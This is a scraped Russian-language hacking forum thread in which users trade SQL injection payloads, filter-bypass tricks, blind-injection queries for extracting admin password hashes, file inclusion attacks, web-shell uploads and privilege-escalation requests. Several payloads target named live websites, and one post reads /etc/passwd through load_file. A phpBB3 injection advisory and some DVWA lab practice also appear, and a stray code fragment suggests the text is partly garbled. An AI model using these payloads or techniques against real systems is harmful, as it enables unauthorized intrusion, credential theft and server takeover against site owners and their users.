Disabled PHP Functions: apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system

какие еще функции есть которые выполняяют системные команды?

blesse said:

Code:
Disabled PHP Functions: apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system

какие еще функции есть которые выполняяют системные команды?


Это необходимо смотреть по функциям и классам, доступным на данном сервере вычитая из них всё заблокированное и бесполезное. Такие вопросы обычно решаются индивидуально т.к. сложно дать ответ не имея полного представления о сервере.

UDP. Всю необходимую информацию можно получить с помощью get_defined_functions(), get_defined_vars(), get_defined_constants() и get_declared_classes().

XAMEHA said:
Это необходимо смотреть по функциям и классам, доступным на данном сервере вычитая из них всё заблокированное и бесполезное. Такие вопросы обычно решаются индивидуально т.к. сложно дать ответ не имея полного представления о сервере.


какие данные предоставить о системе ?

blesse, ну у вас хотя бы нет в списке eval() (http://php.net/manual/ru/function.eval.php) и assert() (http://php.net/manual/ru/function.assert.php) . Можете через них свободно работать, залить через них Perl Shell (PPS 1.0) (https://rdot.org/forum/showthread.php?t=1143) и дальше можете плевать на все эти ограничения т.к. Ваш список применим только к РНР файлам!

=-1+union+select+1,COLUMN_NAME,3,4+from+INFORMATION_ SCHEMA.COLUMNS+where+TABLE_NAME=%22Users%22

есть такой запрос к базе.

Users должно быть в одинарных кавычках? Одинарные кавычки заменяются на %22, есть другой способ?

Semer said:
=-1+union+select+1,COLUMN_NAME,3,4+from+INFORMATION_ SCHEMA.COLUMNS+where+TABLE_NAME=%22Users%22
есть такой запрос к базе.
Users должно быть в одинарных кавычках? Одинарные кавычки заменяются на %22, есть другой способ?


переведи users в ХЕКС значение, в твоем случае оно равняется 0x7573657273

т.е твои запрос будет выглядеть так:


-1+union+select+1,COLUMN_NAME,3,4+from+INFORMATION_ SCHEMA.COLUMNS+where+TABLE_NAME=0x7573657273

Вопрос по sql inj

Делаю запрос:

redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9 --+

говорит что нужно продолжить подбирать количество столбцов

ок. уже посылаю такой запрос redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9,10 --+

нарушен синтаксис и выдает:


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3,4,5,6,7,8,9,10 -- '' at line 1


Как правильно составить запрос? прощу помощи. Думаю сайт светить не обязательно. я просто тренируюсь, потом админов оповещу.

shumaher said:
Вопрос по sql inj
Делаю запрос:
redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9 --+
говорит что нужно продолжить подбирать количество столбцов
ок. уже посылаю такой запрос redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9,10 --+
нарушен синтаксис и выдает:
Как правильно составить запрос? прощу помощи. Думаю сайт светить не обязательно. я просто тренируюсь, потом админов оповещу.


Думаю проблема или в пробеле (что навряд ли), при условии что ты нашёл инъекцию в строковой переменной.

тогда попробуй запросы


Code:
id=1'/**/and/**/1='1
id=1'/**/and/**/1='2

Если результаты будут отличаться - фильтруется пробел

Ещё возможно что ты ковыряешь целочисленную перменную, тогда попробуй так


Code:
id=1/**/and/**/1=1
id=1/**/and/**/1=2

Если страницы отличаются - это твой случай

Перед использованием order by не грешно было бы проверить какого типа переменная перед тобой

id='/**/and/**/1=1/**/order/**/by/**/100+--+

или

id='/**/order/**/by/**/'100

выплюнет что столбцов много - у тебя переменная строкового типа

id=/**/and/**/1=1/**/order/**/by/**/100+--+

соответственно аналог

id/**/order/**/by/**/100

выплюнет что столбцов много - у тебя переменная целочисленного типа

З.Ы. А вообще это заезженная тема, гораздо приятнее работать не с теорией а практикой. Так что прошу по возможности выкладывать сюда сайты, вызывающие проблемы.

З.Ы.Ы. не поленись почитать это (https://antichat.live/threads/43966/)

Вообщем такая проблема, есть шелл права везде зелёные, но когда правишь любой файл он не сохраняется и даже удалить ничего нельзя, раньше было всё как обычно, но злобный админ что-то сделал что теперь я не могу ничего править и удалять, а только заливать а в шелле права сами зелёные, что мог натворить админ?

в sql инъекции не проходит точка .

то есть не могу достать имена из schema.tables

есть варианты?

И еще если пишу + from xxx то добовляет префикс

aaa.xxx

seozone, сделайте lsattr и смотрите параметр -i. Есди он стоит, то это и запрещает Вам редактирование!


Выписка из мануала...
Файл с установленным атрибутом `i' становится полностью не модифицируемым (недосягаемым): он не может быть удален или переименован, никакие ссылки не могут быть созданы на этот файл и никакие данные не могут быть записаны в него. Только суперпользователь или процесс, обладающий возможностью CAP_LINUX_IMMUTABLE может установить или очистить такой атрибут


Если он есть, то можно попробовать снять, если конечно прав хватит!


Code:
chattr -i /etc/lilo.conf

RazyKK said:
в sql инъекции не проходит точка .
то есть не могу достать имена из schema.tables
есть варианты?
И еще если пишу + from xxx то добовляет префикс
aaa.xxx


вместо точки попробуй url=кодированоое значение точки - %2e

Хотя был случай. когда фильтровалось обычное url кодирование, но не фильтровалось двойной url-кодирование. Для точки это значение %252e

from+information_schema%2etables

from+information_schema%252etables

А префикс добавляет потому что ищет таблицу в текущей БД.

Полный запрос должен быть вида from+`database`.`table1`

нет, всеравно фильтрует. попробовал char и hex -ошибка.

Может можно через where и like запрос сделать без точки?

Есть слепая blind sql инъекция

Проверил

test.ru/forum/viewtopic.php?id=1' and 2-1='1 true

test.ru/forum/viewtopic.php?id=1' and 2-1='2 false

Известно название таблицы, полей

Так же известно название таблицы с юзерами "users_am"

и наличие полей "id" , "login", "password"

Известен id и логин админа

Возникает вопрос, как достать хэш пароля?

в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.

"]
[c0de] said:
Есть слепая blind sql инъекция
Проверил
test.ru/forum/viewtopic.php?id=1' and 2-1='1 true
test.ru/forum/viewtopic.php?id=1' and 2-1='2 false
Известно название таблицы, полей
Так же известно название таблицы с юзерами "users_am"
и наличие полей "id" , "login", "password"
Известен id и логин админа
Возникает вопрос, как достать хэш пароля?
в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.


mysql?

m00c0w

да

"]
[c0de] said:
Есть слепая blind sql инъекция
Проверил
test.ru/forum/viewtopic.php?id=1' and 2-1='1 true
test.ru/forum/viewtopic.php?id=1' and 2-1='2 false
Известно название таблицы, полей
Так же известно название таблицы с юзерами "users_am"
и наличие полей "id" , "login", "password"
Известен id и логин админа
Возникает вопрос, как достать хэш пароля?
в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.


test.ru/forum/viewtopic.php?id=1'+and+1=2+union+all+slelect+conc at(id,0x3a,login,0x3a,password)+from+users_am+limi t+0,1+and+1='1

А вообще если у тебя есть login и password - зачем тебе хэш ??

BigBear

Так нету пароля, известно только что поле есть password а там хэш пароля

Запрос не работает к сожалению. Страница меняется

Суть такая, проверял наличие таблиц, если такая есть => страница без изменений

Нету => пропадают стили, скрипты

В запросе пробелы где нужно убрал если что.

А куда запрос должен был то вывестись? Скуля то слепая

В запросе пробелы где нужно убрал если что.


а


+slelect+


исправил на select ?

Red[S1]

да

Все равно не катит

"]
[c0de] said:
BigBear
Так нету пароля, известно только что поле есть password а там хэш пароля
Запрос не работает к сожалению. Страница меняется
Суть такая, проверял наличие таблиц, если такая есть => страница без изменений
Нету => пропадают стили, скрипты
В запросе пробелы где нужно убрал если что.
А куда запрос должен был то вывестись? Скуля то слепая


Да, с slelect очепятался, бывает =)

если блайнд то тут 2 вариант на выбор


Code:
test.ru/forum/viewtopic.php?id=1'+and+ascii(substring(select+con cat(id,0x3a,login,0x3a,password)+from+users_am+lim it+0,1),1,1)>50+and+1='1

или


Code:
test.ru/forum/viewtopic.php?id=1+and+1=IF(ascii(substring(select +concat(id,0x3a,login,0x3a,password)+from+users_am +limit+0,1),1,1)>50,1,2)+and+1='1

Цветом выделены динамические переменные

1ая отвечает за номер записи в бд users_am (по дефолту идёт считывание данных из 1-ой записи)

2ая отвечает за порядок извлекаемого символа из строки id:login: password (по дефолту идёт извлечение первого символа)

3ья отвечает за код ascii символа в десятичном формате (Dec), по нему будешь ориентироваться, какой символ стоит на каком месте

Если в процессе будешь получить НЕ ПУСТУЮ страницу - значит запрос получился верный.

То есть в id:login: password на {1} строке таблицы users_am на позиции {2} находится ascii символ {3}

Знаю, что сложнова-то для восприятия, но как мог так помог =)

нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by=1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?

Halahack said:
нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by=1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?


К таким вопросам обычно прилагается ссылка на сайт для помощи.

(с) Телепаты в отпуске !!!

BigBear said:
К таким вопросам обычно прилагается ссылка на сайт для помощи.
(с) Телепаты в отпуске !!!


http://lonyung.com.cn/buy.php?id=`76

Halahack said:
http://lonyung.com.cn/buy.php?id=`76



http://lonyung.com.cn/buy.php?id=76 and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2)) x from nformation_schema.tables group by x)a)

Halahack said:
нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by
=
1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?



Красным выделено, ЧТО за знак равно?

Та то вместо + случайно поставил.

Прошу помощи

расскажите про уязвимость HTTP Verb Tampering

diny said:
Прошу помощи
расскажите про уязвимость HTTP Verb Tampering


google: "уязвимость HTTP Verb Tampering"

сразу же первая ссылка с рассказом об этой уязвимости.


http://www.ptsecurity.ru/ics/%D0%AE.%D0%93%D0%BE%D0%BB%D1%8C%D1%86%D0%B5%D0%B2_ %D0%A3%D1%8F%D0%B7%D0%B2%D0%B8%D0%BC%D0%BE%D1%81%D 1%82%D0%B8_web_%D1%81%D0%BB%D0%BE%D0%B6%D0%BD%D1%8 B%D0%B5_%D1%81%D0%BB%D1%83%D1%87%D0%B0%D0%B8.pdf


P.S: Тоже почитаю)

залил shel (https://antichat.live/threads/287507/)l на сайт joomla теперь вижу все файлы на сервере,подскажите пожалуйста как узнать под каким пользователем и с какими правами я там нахожусь? Некоторые папки и файлы не могу просматривать,такие как master.passwd и т.д,файл passwd просматривать могу.Извените за ламерский вопрос,новичёк.Спасибо.

Sat-hacker said:
залил
shel (https://antichat.live/threads/287507/)
l на сайт joomla теперь вижу все файлы на сервере,подскажите пожалуйста как узнать под каким пользователем и с какими правами я там нахожусь? Некоторые папки и файлы не могу просматривать,такие как master.passwd и т.д,файл passwd просматривать могу.Извените за ламерский вопрос,новичёк.Спасибо.


Верхний левый угол - Group = , Id =

Или команда в конcоли

whoami

id

PHP:
include($_GET['file'] .'.html');



Почему то после первого обращения к include.php?file=../../../../../../../etc/passwd%00 вылетает ошибка:


Code:
Warning: include(): Failed opening '../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/include.php on line 2

А после последующих:


Code:
Warning: include(../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /var/www/include.php on line 2 Warning: include(): Failed opening '../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/include.php on line 2

То есть нулл-байт не обрезает расширение. Приходится чистить кэш или перезапускать браузер.

magic_quotes_gpc = off.

попробуй вместо нулл байта 4096 слешей

../../../../../../../etc/passwd/////////////////////////////...

RazyKK said:
попробуй вместо нулл байта 4096 слешей
../../../../../../../etc/passwd/////////////////////////////...


Только хотел про это написать) Подставил вместо нулл-байта 2500 повторений /.

Получилась такая строка ../../../../../../../etc/passwd/./././.[...]/./.

В таком случае все время ошибка:


Code:
Warning: include(../../../../../../../etc/passwd/././././.[...]/././././././. in /var/www/include.php on line 2 Warning: include(): Failed opening '../../../../../../../etc/passwd/./././././././.[...]/./././././. in /var/www/include.php on line 2

P.S. просто 4096 слэшей не будут работать, т.к. php обрабатывает их не так, как /. . /. удаляется полностью, а // меняются на /, в итоге в конце получим путь не к файлу, а к директории.

BigBear said:
Верхний левый угол - Group = , Id =
Или команда в конcоли
whoami
id


Сижу на сервере под юзером WWW

www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin

Подскажите пожалуйста можна ли как-то повысить права или что интересного можна сделать на сервере? Спасибо.

Sat-hacker said:
Сижу на сервере под юзером WWW
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
Подскажите пожалуйста можна ли как-то повысить права или что интересного можна сделать на сервере?
Спасибо.


Пропиши в консоле uname-a и покажи что выдало.

$ uname-a

Query did not return anything

Sat-hacker said:
$ uname-a
Query did not return anything


с пробелом надо uname -a

FreeBSD dh01.hostmedia.net 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Mon Feb 2 17:54:17 EET 2009 root@dm1.wugluskr.org:/usr/src/sys/amd64/compile/iServer amd64

Расскажите про уязвимость HTTP Verb Tampering , читал мануалы. Так понял, это из GET запроса в livehttp ( мазила ) менять на POST запрос и все?

Но что то не получается...

Кто поможет крутануть это дело с подзапросом (без error based)

http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68

Dr.Strangelove said:
Кто поможет крутануть это дело с подзапросом (без error based)
http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68


http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68+or+1+group+by+concat(version(),floor(r and(0)*2))having+min(0)+or+1--+

идем в раздел статей и курим до утра

diny said:
Расскажите про уязвимость HTTP Verb Tampering , читал мануалы. Так понял, это из GET запроса в livehttp ( мазила ) менять на POST запрос и все?
Но что то не получается...


Насколько я понял, уязвимость заключается в неправильной настройке доступа к данным.

Например ты хочешь прочитать .htaccess, но тебе вылетает 403. Предположим, что в этом случае передается в запросе параметр name с логином юзера, и если он равен 'admin', то доступ разрешен, если нет то 403. Так вот изменив в таком запросе свой логин на 'admin', ты получишь доступ файлу.

Помогите новичку получить root на FreeBSD 7.1-RELEASE ,не могу разобраться,спасибо.

http://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=-1%20/*!union*/%20/*!all*/%20*!select*/%20111111111,22222222,33333,bbbbbbbbb--

как обойти филтрацию? фильтруется все, кроме A-z и пробела. Даже запятые в примере выше

DeepXhadow said:
http://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=-1%20/*!union*/%20/*!all*/%20*!select*/%20111111111,22222222,33333,bbbbbbbbb--
как обойти филтрацию? фильтруется все, кроме A-z и пробела. Даже запятые в примере выше


Ну я бы не сказал что "прям уж почти всё фильтруется". Это высказывание ложно.

Для начала - инъекция с участием order by проходит на Ура.


Code:
_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+order+by+8+--+ TRUE

_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+order+by+9+--+ FALSE

group by как альтернативу order by кстати тоже пропускает.


Code:
_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+group+by+8+--+

_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+group+by+9+--+

Вопрос - Как ты подбирал столбцы ? Почему их у тебя 4 ?

Далее - фильтруется не union и не select - фильтруется связка union+select . Обошёл так. Стандартно так-то.


Code:
_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+union+/*!select*/+1

Приеду домой - попробую обойти фильтр запятых через join - хотя можешь и сам попробовать.

[QUOTE="None"]
Name : phpBB3 SQL Injection
------------------------------------------------------------------
Date : 27.07.2012
------------------------------------------------------------------
Site : www.phpbb.com
------------------------------------------------------------------
Version : 3.0.10
------------------------------------------------------------------
1) What is it?
This is very nice forum board. You should try it!
------------------------------------------------------------------
2) Type of bug?
SQL Injection (or SQL-info-Leak if You want).
------------------------------------------------------------------
3) Where is the bug?
Vulnerable parameter seems to be 'style' because if we set up this parameter
to 'bigger number' (for example: 111111111) we will get an error, with full SQL
statement.
*updated - dateformat is the second vulnerable parameter!
*updated - post_st is the 3rd vulnerable parameter!
*updated - another one: topic_st
4) PoC traffic from Burp:
4.1) Request :
---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&amp;mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close
viewemail=1
&amp;massemail=1
&amp;allowpm=1
&amp;hideonline=0
&amp;notifypm=1
&amp;popuppm=0
&amp;lang=en
&amp;style=%2b1111111111
&amp;tz=0
&amp;dst=0
&amp;dateoptions=D+M+d%2C+Y+g%3Ai+a
&amp;dateformat=D+M+d%2C+Y+g%3Ai+a
&amp;submit=Submit
&amp;creation_time=1343370877
&amp;form_token=576...
---
4.2) Response:
---
HTTP/1.1 503 Service Unavailable
Date: Fri, 27 Jul 2012 06:39:06 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2889
Return to the index page

General Error
SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
WHERE user_id = 2

BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)
---
4.2 Other response (this time from post_st parameter):
---

Return to the index page


General Error
SQL ERROR [ mysqli ]

Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]

An SQL error occurred while fetching this page.
Please contact the Return to the index page

General Error
SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
WHERE user_id = 2

BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)
---
4.2 Other response (this time from post_st parameter):
---

Return to the index page


General Error
SQL ERROR [ mysqli ]

Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]

An SQL error occurred while fetching this page.
Please contact the

CoBecTb для начало просто изучи английский тут же все и так понятно по логике, и все показано и какие тулзы понадобятся.

shell_c0de said:
CoBecTb для начало просто изучи английский тут же все и так понятно по логике, и все показано и какие тулзы понадобятся.


Я всё понимаю, и на каких то форумах аналогично могу ответить как и ты, но в данный момент мне хотелось бы прочитать ответ на мой вопрос. Переводил, ничего не понял, да признаю что нету у меня образования в этой области. Поэтому прошу помощи. Заранее благодарю.

BigBear, там фильтрация ( и ) есть. как ее обходить - хз. про ордер бай я знаю, просто для примера 4 сделал

DeepXhadow said:
BigBear, там фильтрация ( и ) есть. как ее обходить - хз. про ордер бай я знаю, просто для примера 4 сделал


Ага, уже посмотрел. + фильтруются любые математические сравнения типа .

Есть надежда, может они Post запрос не так жёстко фильтровать будут. Надо проверить. А в GET запросах нам точно тут ничего не светит.

Какие еще есть идеи с раскруткой lfi хотя бы до мини-шелла, если phpinfo нет, environ показывает ошибку и denied? Полный путь известен, в конфиг-файлах явок и паролей нет

Так если навскидку:

искать логи и попытатся их проинклудить

попытатся залить что то и проинклудить, может там форум есть и можно аватару со своим кодом запилить и т.д.

попробовать через протокол data

попробовать проинклудить отправленный на email письмо, если на сервере конечно что то такое крутиться

попробывать залить какой либо файл через соседей и проинклудить

В скрипте поиска кавычка выдает ошибку:

WHERE (name_ru LIKE '%'%' OR product_code LIKE '%'%') AND...

Как тут выполнить order by?

RazyKK said:
В скрипте поиска кавычка выдает ошибку:
WHERE (name_ru LIKE '%'%' OR product_code LIKE '%'%') AND...
Как тут выполнить order by?


1: WHERE (name_ru LIKE '%name') order by{sql-запрос}#%' OR product_code LIKE '%'%') AND...

2: WHERE (name_ru LIKE '%'%' OR product_code LIKE '%name') order by{sql-запрос}'#%')AND...

P.S: Тут провидцев нет, давай урл и вывод ошибки!

old.islam.kg/?i=1'&lg=kg

Помогите со скулей плз. Еще возможно IP записывает, так что..


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '77.245.182.175'' at line 1


p.s. ip конечно изменен

Там режутся пробелы, /**/, пробывал еще такие варианты - %09,%0A,%0B,%0C,%0D , при них запрос как бы "вырезается", фильтруются также (). Если найдеш способоб обойти фильтр пробелов, то скорейвсего раскрутишь если она не слепая конечно.

По ip еще, у меня сейчас нет возможности проверить, но попробуй сам отправить в хедерах свой X-FORWARDED-FOR с sql inj, если повезет и ip у них определяется именно так, то может там и условия получше будут.

Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11+--+

но запара - фильтрация кавычек - file_priv считать ну никак не получается

trololoman96 said:
попробуй сам отправить в хедерах свой X-FORWARDED-FOR с sql inj, если повезет и ip у них определяется именно так, то может там и условия получше будут.


Кроме X-Forwarded-For можно попробовать Forwarded, X-Real-IP, Client-IP, HTTP-From, Via

SpiritDt said:
Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
но запара - фильтрация кавычек - file_priv считать ну никак не получается


Нету доступа к mysql.user.

Что бы смотреть file_priv кавычки не нужны.

есть какой-нибудь мануал или статья о том как залиться если file_priv=Y но magic_quotes_gpc = on

зы это читал ,но не понял логику запросов

/showpost.php?p=663815&postcount=39

Не могу раскрутить , хелп

http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27

SpiritDt said:
Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
но запара - фильтрация кавычек - file_priv считать ну никак не получается


Magic Quotes = On


Code:
http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,'10',1 1+--+

False

File_Priv=N


Code:
http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,load_f ile(0x2f6574632f706173737764),11+--+

False

Саму БД не смотрел - мож там админка есть...


blesse said:
есть какой-нибудь мануал или статья о том как залиться если file_priv=Y но magic_quotes_gpc = on
зы это читал ,но не понял логику запросов
/showpost.php?p=663815&postcount=39


Это прокатывает только при двойном запросе и то, при варианте, что данные передаваемые из первого запроса во второй дополнительно не фильтруются.

Nikel3rN said:
Не могу раскрутить , хелп
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27


Тут вся проблема в том, что магические кавычки включены

Остаётся вариант Error-Based

Твой запрос имеет вид


Code:
SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m
JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309)
JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%[INJECT]')) WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl;

и всё бы хорошо, в теории должен бы был проканать запрос вида


Code:
SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m
JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309)
JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%\\')) or (select count(*) from l2_drops_rg group by concat(version(),floor(rand(0)*2))+--+%'))
WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl;

но в нашем случае хвост запроса не отбрасывается никаким способом. Во всяком случае - я пока не нашёл способа инъекта.

P.S. Поправьте меня, если я ошибаюсь.

P.S S. cat1vo красава ! А у меня сёдня бошка вообще не варит после картошки =(

Nikel3rN said:
Не могу раскрутить , хелп
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27


Дальше думаю сами сможете?


Code:
http://www.l2db[dot]ru/npc/index/2/rg/all/all/8/all/\'))+and+extractvalue(1,concat(0x3a,version()))+--+-

Version: 5.1.52-log

DB_user: l2db_ru@10.0.66.21

Current_db: l2dbtest

to BigBear, поправил, Вы ошибались!

Народ нужен хелп, LFI вроде есть, но не выводится ниче.

deabloz.com/modules/boonex/poll/index.php?aModule=

Пробую данный сплоит:

1337day.com/exploits/14663

что то не получается раскрутить,может кто подсказать

http://www.turboklicker.de/index.php?content=/nickpage&id=2

wkuzy said:
что то не получается раскрутить,может кто подсказать
http://www.turboklicker.de/index.php?content=/nickpage&id=2


Указывайте, пожалуйста, параметры в которых вы подозреваете инъекцию. И способы, которые вы пробовали для их раскрутки.

Есть сайт, в при входе на него твой айпи просто проверяется в базе и если найден то Die, айпи проверяется по HTTP_X_FORWARDED_FOR, который можно заменить в хттп заголовке

Но если запрос успешен то он просто он ничего не выводит. Прав за напись нету.

Самая главная проблема вот в чем, фильтруется ',' и ';' и фильтруется таким образом, что было до нее обрезает впрочь. т.е:

x-forwarded-for: UNION SELECT ALL (SELECT, * FROM banned) -- AND users='"

А ответ MySQL ERROR 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '", 95.134.22.54'' at line 1

#0 mysql_exec(select * from banned where ip='* FROM banned) -- AND users='", Айпи тут был')

Спасибо.

Подскажите с SQL inj в DVWA level medium

http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit

выводит


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UnIoN sElECT 1,2--' at line 1


'\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут

upd. разобрался. успешно прошел запрос:


http://localhost/dvwa/vulnerabilities/sqli/?id=1%20and%201=1%20union%20select%20concat(versio n(),0x3a,user(),0x3a,database()),2&Submit=Submit


только не понимаю, как я это обошел, подскажите плиз.

upd2.

перешел на high. его реально пройти вообще? как выполнить xss?

Подскажите с SQL inj в DVWA level medium
http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit
выводит

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UnIoN sElECT 1,2--' at line 1


'\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут


" if author else f"

Подскажите с SQL inj в DVWA level medium
http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit
выводит

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UnIoN sElECT 1,2--' at line 1


'\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут


Почитай про Magic Quotes (http://www.php.net/manual/ru/info.configuration.php#ini.magic-quotes-gpc)

А вот тут (https://antichat.live/showpost.php/p/407225/postcount/2/) можно прочитать про отличия инъекций в строковом параметре от инъекций в числовом параметре

здравствуйте.

www.site1.ru/index.php?page=http://www.site2.ru срабатывает и подгружает site2 вместе с site1.везде тут в статьях написано ура супер круто мы получили веб шелл.но чета подробнее об этом не нашел. вопрос таков.что делать дальше)

я так понимаю теперь необходимо залить на some хостинг файлик shell.php и составить

запрос типа http://site1.ru/index.php?page=http://www.site2.ru/shell - без расширения на конце. это и будет наш шелл? я правильно все понимаю? если нет пните в правильную сторону)

mod_ said:
здравствуйте.
www.site1.ru/index.php?page=http://www.site2.ru срабатывает и подгружает site2 вместе с site1.везде тут в статьях написано ура супер круто мы получили веб шелл.но чета подробнее об этом не нашел. вопрос таков.что делать дальше)
